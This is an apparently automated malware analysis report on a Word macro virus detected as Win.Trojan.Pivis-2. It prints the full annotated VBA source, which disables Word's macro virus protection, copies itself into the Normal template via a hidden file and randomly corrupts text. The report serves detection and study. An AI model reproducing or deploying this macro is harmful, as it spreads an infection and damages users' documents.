Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49a5b420151c3db4…

MALICIOUS

Office (OLE)

40.5 KB Created: 2001-09-24 12:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9f708f81fd3cc6a086b67a70c6ff0125 SHA-1: 94b9316e91a6376cc8b1350bd1ef5250cf48b0f5 SHA-256: 49a5b420151c3db455fbd8327b9ff41eba5a44dc0b27de3be633092f81ced81b
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros, detected as malicious by ClamAV with multiple signatures. The VBA code attempts to save itself to 'c:\captainL.$$$' and potentially re-inject it into the Normal template or the active document. This behavior suggests an attempt to establish persistence or prepare for further malicious execution, though the exact payload is not discernible from the truncated script.

Heuristics 2

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9454 bytes
SHA-256: 06fc10bcab4c378902b2ece4e5230aae227da6e973fee2acb67edddaa4791459
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba: the code lives in the document's ThisDocument
' class module (VB_Base names the Normal template it derives from), so the
' Document_Close / Document_New handlers below are Word document events and run
' without the user invoking a macro by name.
Private Sub Document_Close()
' Word document-close event handler. Observed behaviour, in order:
'   (1) dump this module's source to a hidden file on C:,
'   (2) copy that source into the Normal template or the active document,
'   (3) on certain dates, alter characters in the document text,
'   (4) save the document silently and restore its Saved flag.
' Every error is suppressed by On Error Resume Next, so any step may fail silently.

' Drop-file path and attribute value; 6 = vbHidden (2) + vbSystem (4), so the
' file is hidden from ordinary directory listings.
fName = "c:\captainL.$$$"
fAttr = 6

On Error Resume Next
' Prevent the user from interrupting the macro with Ctrl+Break.
Application.EnableCancelKey = wdCancelDisabled
Randomize
' Disable Word's prompts, including its built-in macro virus warning, before
' other documents/templates are modified.
With Options
  .ConfirmConversions = False
  .VirusProtection = False
  .SaveNormalPrompt = False
End With
'saving to disk
' Only if the drop file does not already exist: write the first VBA component's
' source lines to it, then mark it hidden+system. t is assigned twice; the
' second Set (MacroContainer) is the one in effect, and if it fails the earlier
' ActiveDocument value is kept because the error is swallowed.
If Dir(fName, fAttr) = "" Then
  Set t = ActiveDocument.VBProject.VBComponents.Item(1)
  Set t = MacroContainer.VBProject.VBComponents.Item(1)
  Open fName For Output As #1
    For i = 1 To t.CodeModule.CountOfLines
      Print #1, t.CodeModule.Lines(i, 1)
    Next
  Close #1
  SetAttr fName, fAttr
End If

' Choose the replication target by checking whether the first module line is
' already this handler's signature: prefer the Normal template (persists across
' Word sessions), fall back to the active document (spreads with the file); if
' both already carry the signature, t becomes "" and the copy step is skipped.
Set t1 = NormalTemplate.VBProject.VBComponents.Item(1)
Set t2 = ActiveDocument.VBProject.VBComponents.Item(1)

If t1.CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
  Set t = t1
ElseIf t2.CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
  Set t = t2
Else
  t = ""
End If

'dup
' Replicate: read the drop file back line by line and insert each line at the
' top of the target module, which makes the target's first line the signature
' checked above.
If t <> "" Then
  Open fName For Input As #1
  If LOF(1) <> 0 Then
    i = 1
    Do While Not EOF(1)
      Line Input #1, txt
      t.CodeModule.InsertLines i, txt
      i = i + 1
    Loop
  End If
  Close #1
End If

'action
' Payload: outside April and May, with date- and Rnd-dependent probability,
' characters of the document body are substituted. The accented-vowel set is
' presumably aimed at Italian-language text (not confirmed from the page).
sav = ActiveDocument.Saved
today = Day(Date)
If (Month(Date) < 4) Or (Month(Date) > 5) Then
  ' Empty branch — no effect.
  If today = 17 Then
  End If
  Set t = ActiveDocument.Characters
  ' After the 21st, ~32% of closes: swap accented vowels.
  If (Rnd < 0.321) And (today > 21) Then
    For i = 1 To t.Count
      ch = t.Item(i)
      If ch = "è" Then
        t.Item(i) = "à"
      ElseIf ch = "é" Then t.Item(i) = "e"
      ElseIf ch = "à" Then t.Item(i) = "a"
      ElseIf ch = "ì" Then t.Item(i) = "ù"
      ElseIf ch = "ò" Then t.Item(i) = "o"
      ElseIf ch = "ù" Then t.Item(i) = "ì"
      End If
    Next
  End If
  ' Before the 5th, ~22% of closes: mangle punctuation.
  If (Rnd > 0.777) And (today < 5) Then
    For i = 1 To t.Count
      ch = t.Item(i)
      If ch = ":" Then
        t.Item(i) = "."
      ElseIf ch = "," Then t.Item(i) = " "
      ElseIf (ch = ".") And (Rnd < 0.5) Then t.Item(i) = "!"
      ElseIf ch = "!" Then t.Item(i) = "?"
      ElseIf ch = "?" Then t.Item(i) = "!"
      End If
    Next
  End If
End If

'update doc
' Save in place unless the document is still an unsaved "Document..." name, then
' put back the original Saved flag — presumably so the user is not prompted and
' the modification is not apparent. Useful detection signal: a Document_Close
' handler that writes to the Normal template and saves the document without a prompt.
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ActiveDocument.Saved = sav

End Sub

' Empty Document_New handler: nothing runs when a new document is created from
' this template; all observed behaviour is in Document_Close.
Private Sub Document_New()

End Sub

' Processing file: /opt/analyzer/scan_staging/751aa463e00c47c795fb69dbca0c288b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8899 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	LitStr 0x000F "c:\captainL.$$$"
' 	St fName 
' Line #3:
' 	LitDI2 0x0006 
' 	St fAttr 
' Line #4:
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	ArgsCall Read 0x0000 
' Line #8:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #9:
' 	LitVarSpecial (False)
' 	MemStWith ConfirmConversions 
' Line #10:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #11:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #12:
' 	EndWith 
' Line #13:
' 	QuoteRem 0x0000 0x000E "saving to disk"
' Line #14:
' 	Ld fName 
' 	Ld fAttr 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #15:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set t 
' Line #16:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set t 
' Line #17:
' 	Ld fName 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #18:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld t 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #19:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 
... (truncated)